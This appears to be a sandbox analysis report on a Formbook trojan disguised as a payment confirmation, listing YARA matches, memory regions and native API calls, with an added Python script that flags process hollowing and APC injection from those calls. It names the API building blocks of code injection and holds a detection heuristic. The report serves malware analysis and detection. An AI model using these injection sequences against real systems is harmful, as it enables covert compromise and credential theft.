Source: Yara match | File source: 00000007.00000002.453167373.0000000000080000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.745450083.00000000003E0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.745318015.00000000001C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.386042260.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.745339267.0000000000280000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.745411785.0000000000310000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.745725908.0000000002CD0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.387128807.0000000000BB0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

System Summary

Source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000002.00000002.386010513.00000000001A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000007.00000002.453167373.0000000000080000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000003.00000002.745450083.00000000003E0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000004.00000002.745318015.00000000001C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000002.00000002.386042260.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000004.00000002.745339267.0000000000280000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000004.00000002.745411785.0000000000310000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000003.00000002.745725908.0000000002CD0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000002.00000002.387128807.0000000000BB0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: initial sample | Static PE information: Filename: Payment confirmation 20240911.exe
Source: C:\Users\user\Desktop\Payment confirmation 20240911.exe | Memory allocated: 770B0000 page execute and read and write
Source: C:\Windows\SysWOW64\svchost.exe | Memory allocated: 770B0000 page execute and read and write
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe | Memory allocated: 770B0000 page execute and read and write
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0042C863 NtClose,2_2_0042C863
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_008C07AC NtCreateMutant,LdrInitializeThunk,2_2_008C07AC
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_008BF9F0 NtClose,LdrInitializeThunk,2_2_008BF9F0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_008BFAE8 NtQueryInformationProcess,LdrInitializeThunk,2_2_008BFAE8
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_008BFB68 NtFreeVirtualMemory,LdrInitializeThunk,2_2_008BFB68
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_008BFDC0 NtQuerySystemInformation,LdrInitializeThunk,2_2_008BFDC0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_008C00C4 NtCreateFile,2_2_008C00C4
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_008C0048 NtProtectVirtualMemory,2_2_008C0048
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_008C0060 NtQuerySection,2_2_008C0060
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_008C0078 NtResumeThread,2_2_008C0078
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_008C01D4 NtSetValueKey,2_2_008C01D4
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_008C010C NtOpenDirectoryObject,2_2_008C010C
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_008C0C40 NtGetContextThread,2_2_008C0C40
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_008C10D0 NtOpenProcessToken,2_2_008C10D0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_008C1148 NtOpenThread,2_2_008C1148
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_008BF8CC NtWaitForSingleObject,2_2_008BF8CC
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_008BF900 NtReadFile,2_2_008BF900
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_008BF938 NtWriteFile,2_2_008BF938
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_008C1930 NtSetContextThread,2_2_008C1930
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_008BFAB8 NtQueryValueKey,2_2_008BFAB8
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_008BFAD0 NtAllocateVirtualMemory,2_2_008BFAD0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_008BFA20 NtQueryInformationFile,2_2_008BFA20
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_008BFA50 NtEnumerateValueKey,2_2_008BFA50
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_008BFBB8 NtQueryInformationToken,2_2_008BFBB8
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_008BFBE8 NtQueryVirtualMemory,2_2_008BFBE8
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_008BFB50 NtCreateKey,2_2_008BFB50
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_008BFC90 NtUnmapViewOfSection,2_2_008BFC90
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_008BFC30 NtOpenProcess,2_2_008BFC30
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_008BFC48 NtSetInformationFile,2_2_008BFC48
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_008BFC60 NtMapViewOfSection,2_2_008BFC60
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_008BFD8C NtDelayExecution,2_2_008BFD8C
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_008C1D80 NtSuspendThread,2_2_008C1D80
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_008BFD5C NtEnumerateKey,2_2_008BFD5C
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_008BFEA0 NtReadVirtualMemory,2_2_008BFEA0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_008BFED0 NtAdjustPrivilegesToken,2_2_008BFED0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_008BFE24 NtWriteVirtualMemory,2_2_008BFE24
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_008BFFB4 NtCreateSection,2_2_008BFFB4
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_008BFFFC NtCreateProcessEx,2_2_008BFFFC
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_008BFF34 NtQueueApcThread,2_2_008BFF34
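The svchost.exe functions listed above call the native API directly, and several of them (NtUnmapViewOfSection, NtWriteVirtualMemory, NtSetContextThread, NtResumeThread, NtCreateProcessEx, NtCreateSection, NtMapViewOfSection, NtQueueApcThread) are the building blocks of process hollowing and APC injection. The script below is an added example, not part of the Joe Sandbox report, that parses "Code function" rows of the shape used in this report and flags, per process image, which injection patterns the observed API set covers. The embedded rows are copied from the report; the technique table is this example's own heuristic. A static function listing says nothing about call order, so the output is a triage hint, not proof that injection ran.

```python
"""Added example: triage sandbox "Code function" rows for injection-related
native API sets. Input rows are copied from the report; the technique table
is a heuristic written for this example."""
import re
from collections import defaultdict

# Rows copied from the report above (a subset). The last row keeps the
# fused "exeCode function" form so the parser tolerates both layouts.
REPORT_LINES = r"""
Source: C:\Users\user\Desktop\Payment confirmation 20240911.exe | Code function: 0_2_01337294 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,0_2_01337294
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_008BFC90 NtUnmapViewOfSection,2_2_008BFC90
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_008BFE24 NtWriteVirtualMemory,2_2_008BFE24
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_008C1930 NtSetContextThread,2_2_008C1930
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_008C0078 NtResumeThread,2_2_008C0078
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_008BFFFC NtCreateProcessEx,2_2_008BFFFC
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_008BFFB4 NtCreateSection,2_2_008BFFB4
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_008BFC60 NtMapViewOfSection,2_2_008BFC60
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_008BFF34 NtQueueApcThread,2_2_008BFF34
Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_008BFAD0 NtAllocateVirtualMemory,2_2_008BFAD0
"""

# "Source: <image>[ | ]Code function: <pid_run_addr>[:] <api,api,...,pid_run_addr>"
ROW_RE = re.compile(
    r"^Source:\s*(?P<src>.+?)\s*\|?\s*Code function:\s*"
    r"(?P<fid>\d+_\d+_[0-9A-Fa-f]+):?\s*(?P<apis>.*)$"
)
FID_RE = re.compile(r"^\d+_\d+_[0-9A-Fa-f]+$")   # trailing function id, not an API

# Heuristic technique table (this example's own): every API in "all" plus at
# least one API in "any" (if "any" is non-empty) must appear for the image.
TECHNIQUES = {
    "process hollowing": ({"NtUnmapViewOfSection", "NtWriteVirtualMemory"},
                          {"NtSetContextThread", "NtResumeThread"}),
    "APC injection": ({"NtQueueApcThread", "NtWriteVirtualMemory"}, set()),
    "section mapping injection": ({"NtCreateSection", "NtMapViewOfSection"},
                                  {"NtResumeThread", "NtSetContextThread", "NtQueueApcThread"}),
}


def parse(text):
    """Map each source image to the set of API names seen in its rows."""
    calls = defaultdict(set)
    for line in text.splitlines():
        m = ROW_RE.match(line.strip())
        if not m:
            continue
        tokens = [t.strip() for t in m["apis"].split(",")]
        calls[m["src"]] |= {t for t in tokens if t and not FID_RE.match(t)}
    return dict(calls)


def matched_techniques(apis):
    return sorted(name for name, (need_all, need_any) in TECHNIQUES.items()
                  if need_all <= apis and (not need_any or need_any & apis))


def triage(text):
    """Per image: the injection patterns its API set covers (sorted names)."""
    return {src: matched_techniques(apis) for src, apis in parse(text).items()}


if __name__ == "__main__":
    for src, hits in triage(REPORT_LINES).items():
        print(f"{src}: {', '.join(hits) or 'no injection pattern'}")
```

Running it prints no pattern for the dropper itself and all three patterns for the hollowed svchost.exe. In a real triage feed the same parser can be pointed at the full report export; extend TECHNIQUES rather than the parser when adding patterns.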
Source: C:\Users\user\Desktop\Payment confirmation 20240911.exe | Code function: 0_2_0132713C: CreateFileW,_memset,DeviceIoControl,CloseHandle,0_2_0132713C
Source: C:\Users\user\Desktop\Payment confirmation 20240911.exe | Code function: 0_2_0131B9F1 _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcscpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,0_2_0131B9F1
Source: C:\Users\user\Desktop\Payment confirmation 20240911.exe | Code function: 0_2_013282D0 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,0_2_013282D0
Source: C:\Users\user\Desktop\Payment confirmation 20240911.exe | Code function: 0_2_0130BDF6
Source: C:\Users\user\Desktop\Payment confirmation 20240911.exe | Code function: 0_2_01300183
Source: C:\Users\user\Desktop\Payment confirmation 20240911.exe | Code function: 0_2_012EA0C0
Source: C:\Users\user\Desktop\Payment confirmation 20240911.exe | Code function: 0_2_0132220C
Source: C:\Users\user\Desktop\Payment confirmation 20240911.exe | Code function: 0_2_012E8530
Source: C:\Users\user\Desktop\Payment confirmation 20240911.exe | Code function: 0_2_01318779
Source: C:\Users\user\Desktop\Payment confirmation 20240911.exe | Code function: 0_2_01300677
Source: C:\Users\user\Desktop\Payment confirmation 20240911.exe | Code function: 0_2_012E6670
Source: C:\Users\user\Desktop\Payment confirmation 20240911.exe | Code function: 0_2_0134A8DC
Source: C:\Users\user\Desktop\Payment confirmation 20240911.exe | Code function: 0_2_012F2B40
Source: C:\Users\user\Desktop\Payment confirmation 20240911.exe | Code function: 0_2_012E6BBC
Source: C:\Users\user\Desktop\Payment confirmation 20240911.exe | Code function: 0_2_01300A8F
Source: C:\Users\user\Desktop\Payment confirmation 20240911.exe | Code function: 0_2_012FAD5C
Source: C:\Users\user\Desktop\Payment confirmation 20240911.exe | Code function: 0_2_012E8CA0
Source: C:\Users\user\Desktop\Payment confirmation 20240911.exe | Code function: 0_2_0130AC83
Source: C:\Users\user\Desktop\Payment confirmation 20240911.exe | Code function: 0_2_01314EBF
Source: C:\Users\user\Desktop\Payment confirmation 20240911.exe | Code function: 0_2_01300EC4
Source: C:\Users\user\Desktop\Payment confirmation 20240911.exe | Code function: 0_2_0131113E
Source: C:\Users\user\Desktop\Payment confirmation 20240911.exe | Code function: 0_2_013430AD
Source: C:\Users\user\Desktop\Payment confirmation 20240911.exe | Code function: 0_2_013012F9
Source: C:\Users\user\Desktop\Payment confirmation 20240911.exe | Code function: 0_2_0134F5D0
Source: C:\Users\user\Desktop\Payment confirmation 20240911.exe | Code function: 0_2_012EF5C5
Source: C:\Users\user\Desktop\Payment confirmation 20240911.exe | Code function: 0_2_0131542F
Source: C:\Users\user\Desktop\Payment confirmation 20240911.exe | Code function: 0_2_012F3680
Source: C:\Users\user\Desktop\Payment confirmation 20240911.exe | Code function: 0_2_0131599F
Source: C:\Users\user\Desktop\Payment confirmation 20240911.exe | Code function: 0_2_0130DA74
Source: C:\Users\user\Desktop\Payment confirmation 20240911.exe | Code function: 0_2_012E5D32
Source: C:\Users\user\Desktop\Payment confirmation 20240911.exe | Code function: 0_2_012EBDF0
Source: C:\Users\user\Desktop\Payment confirmation 20240911.exe | Code function: 0_2_012EDCD0
Source: C:\Users\user\Desktop\Payment confirmation 20240911.exe | Code function: 0_2_0130DF69
Source: C:\Users\user\Desktop\Payment confirmation 20240911.exe | Code function: 0_2_0132BFB8
Source: C:\Users\user\Desktop\Payment confirmation 20240911.exe | Code function: 0_2_01317FFD
Source: C:\Users\user\Desktop\Payment confirmation 20240911.exe | Code function: 0_2_01301E5A
Source: C:\Users\user\Desktop\Payment confirmation 20240911.exe | Code function: 0_2_00263610
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_00418913
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_004019A7
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_004101CA
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_004101D3
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_004011F0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_00416ADE
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_00416AE3
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_00402B1D
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_00402B20
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_004103F3
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0040E473
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_00403516
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_00403520
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0042EE63
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_00402700
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_008CE0C6
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_008CE2E9
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_009763BF
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_008F63DB
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_008D2305
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0091A37B
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0095443E
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_009505E3
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_008EC5F0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_00916540
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_008D4680
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_008DE6C1
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0091A634
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_00972622
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_008DC7BC
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_008DC85C
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_008F286D
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0097098E
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_008D29B2
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_009649F5
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_008E69FE
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0091C920
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0097CBA4
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_00956BCB
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_00972C9C
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0095AC5E
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_00900D3B
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_008DCD5B
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_00902E2F
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_008EEE4C
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0096CFB1
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_00942FDC
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_008E0F3F
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_008FD005
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_008D3040
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_008E905A
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0094D06D
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0095D13F
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_00971238
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_008CF3CF
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_008D7353
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_008E1489
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_00905485
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0090D47D
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_009735DA
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_008D351F
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0095579A
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_009057C3
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0096771D
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0094F8C4
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0096F8EE
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_00955955
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0095394B
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_00983A83
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0095DBDA
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_008CFBD7
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_008F7B00
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0096FDDD
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0095BF14
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_008FDF7C
Source: C:\Program Files (x86)\FeFOaLgjviRnzJvbQecOwkXLjqfdrklFEEtiMeHyMpfUBgLMxLsHpsOrLvQVtglctYVPXGT\xONxwdydvq.exe | Code function: 3_2_0040E04B
Source: C:\Program Files (x86)\FeFOaLgjviRnzJvbQecOwkXLjqfdrklFEEtiMeHyMpfUBgLMxLsHpsOrLvQVtglctYVPXGT\xONxwdydvq.exe | Code function: 3_2_0040F8D6
Source: C:\Program Files (x86)\FeFOaLgjviRnzJvbQecOwkXLjqfdrklFEEtiMeHyMpfUBgLMxLsHpsOrLvQVtglctYVPXGT\xONxwdydvq.exe | Code function: 3_2_0040F8DB
Source: C:\Program Files (x86)\FeFOaLgjviRnzJvbQecOwkXLjqfdrklFEEtiMeHyMpfUBgLMxLsHpsOrLvQVtglctYVPXGT\xONxwdydvq.exe | Code function: 3_2_004091EB
Source: C:\Program Files (x86)\FeFOaLgjviRnzJvbQecOwkXLjqfdrklFEEtiMeHyMpfUBgLMxLsHpsOrLvQVtglctYVPXGT\xONxwdydvq.exe | Code function: 3_2_0040726B
Source: C:\Program Files (x86)\FeFOaLgjviRnzJvbQecOwkXLjqfdrklFEEtiMeHyMpfUBgLMxLsHpsOrLvQVtglctYVPXGT\xONxwdydvq.exe | Code function: 3_2_00427C5B
Source: C:\Program Files (x86)\FeFOaLgjviRnzJvbQecOwkXLjqfdrklFEEtiMeHyMpfUBgLMxLsHpsOrLvQVtglctYVPXGT\xONxwdydvq.exe | Code function: 3_2_0041170B
Source: C:\Program Files (x86)\FeFOaLgjviRnzJvbQecOwkXLjqfdrklFEEtiMeHyMpfUBgLMxLsHpsOrLvQVtglctYVPXGT\xONxwdydvq.exe | Code function: 3_2_00408FC2
Source: C:\Program Files (x86)\FeFOaLgjviRnzJvbQecOwkXLjqfdrklFEEtiMeHyMpfUBgLMxLsHpsOrLvQVtglctYVPXGT\xONxwdydvq.exe | Code function: 3_2_00408FCB
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe | Code function: 4_2_61E897F6
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe | Code function: 4_2_61E20012
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe | Code function: 4_2_61E603D3
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe | Code function: 4_2_61E453DE
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe | Code function: 4_2_61E2F3B7
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe | Code function: 4_2_61E3F2D0
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe | Code function: 4_2_61E432AA
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe | Code function: 4_2_61E6D288
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe | Code function: 4_2_61E24497
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe | Code function: 4_2_61E62749
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe | Code function: 4_2_61E1567E
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe | Code function: 4_2_61E28807
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe | Code function: 4_2_61E43816
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe | Code function: 4_2_61E4EB85
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe | Code function: 4_2_61E6FACA
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe | Code function: 4_2_61E1BA5A
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe | Code function: 4_2_61E3CA3A
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe | Code function: 4_2_61E3DFCB
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe | Code function: 4_2_61E51FB5
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe | Code function: 4_2_61E4FEAD
Source: C:\Windows\SysWOW64\svchost.exe | Code function: String function: 008CE2A8 appears 60 times
Source: C:\Windows\SysWOW64\svchost.exe | Code function: String function: 0093F970 appears 84 times
Source: C:\Windows\SysWOW64\svchost.exe | Code function: String function: 00913F92 appears 132 times
Source: C:\Windows\SysWOW64\svchost.exe | Code function: String function: 0091373B appears 253 times
Source: C:\Windows\SysWOW64\svchost.exe | Code function: String function: 008CDF5C appears 137 times
Source: C:\Users\user\Desktop\Payment confirmation 20240911.exe | Code function: String function: 01307750 appears 42 times
Source: C:\Users\user\Desktop\Payment confirmation 20240911.exe | Code function: String function: 012FF885 appears 68 times
Source: sqlite3.dll.4.dr | Static PE information: Number of sections : 18 > 10
Source: Payment confirmation 20240911.exe, 00000000.00000003.349999678.0000000003740000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamentdll.dllj% vs Payment confirmation 20240911.exe
Source: Payment confirmation 20240911.exe, 00000000.00000003.350250762.00000000035BD000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamentdll.dllj% vs Payment confirmation 20240911.exe
Source: Payment confirmation 20240911.exe, 00000000.00000002.350637721.000000000078C000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamesvchost.exej% vs Payment confirmation 20240911.exe
Source: C:\Windows\SysWOW64\RMActivate_ssp.exe | Registry key queried: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Mozilla\Mozilla Firefox\52.0.1 (x86 en-US)\Main Install Directory
Source: Payment confirmation 20240911.exe | Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
Source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000002.00000002.386010513.00000000001A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000007.00000002.453167373.0000000000080000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000003.00000002.745450083.00000000003E0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
